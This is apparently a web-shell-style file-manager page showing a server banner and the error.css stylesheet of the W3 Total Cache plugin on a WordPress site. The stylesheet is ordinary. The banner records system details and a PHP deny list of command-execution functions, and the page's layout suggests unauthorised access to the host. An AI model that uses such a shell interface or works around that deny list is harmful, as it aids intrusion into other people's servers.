HEX
Server: Apache
System: Linux digivps 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC 2025 x86_64
User: www (1000)
PHP: 8.3.15
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/healthyton.com/wp-content/plugins/w3-total-cache/pub/css/error.css
* {
    margin: 0;
    padding: 0;
    color: #464646;
}

html, body {
    height: 100%;
}

body {
    line-height: 1.4em;
}

body, input {
    font-family: "Lucida Grande", Tahoma, Verdana, Arial, sans-serif;
    font-size: 13px;
}

a {
    color: #21759B;
}

a:hover {
    color: #D54E21;
}

.button, input[type="button"], input[type="submit"] {
    font-size: 11px;
    line-height: 16px;
    background: #f2f2f2 url(../img/white-grad.png) repeat-x scroll left top;
    border: 1px solid #bbb;
    color: #464646;
    text-shadow: 0 1px 0 #fff;
    cursor: pointer;
    padding: 2px 8px;
    border-radius: 11px;
    -webkit-border-radius: 11px;
    -moz-border-radius: 11px;
}

.button:hover, input[type="button"]:hover, input[type="submit"]:hover {
    border-color: #666;
    color: #000;
}

.button:active, input[type="button"]:active, input[type="submit"]:active {
    background: #f2f2f2 url(../img/white-grad-active.png) repeat-x scroll left top;
}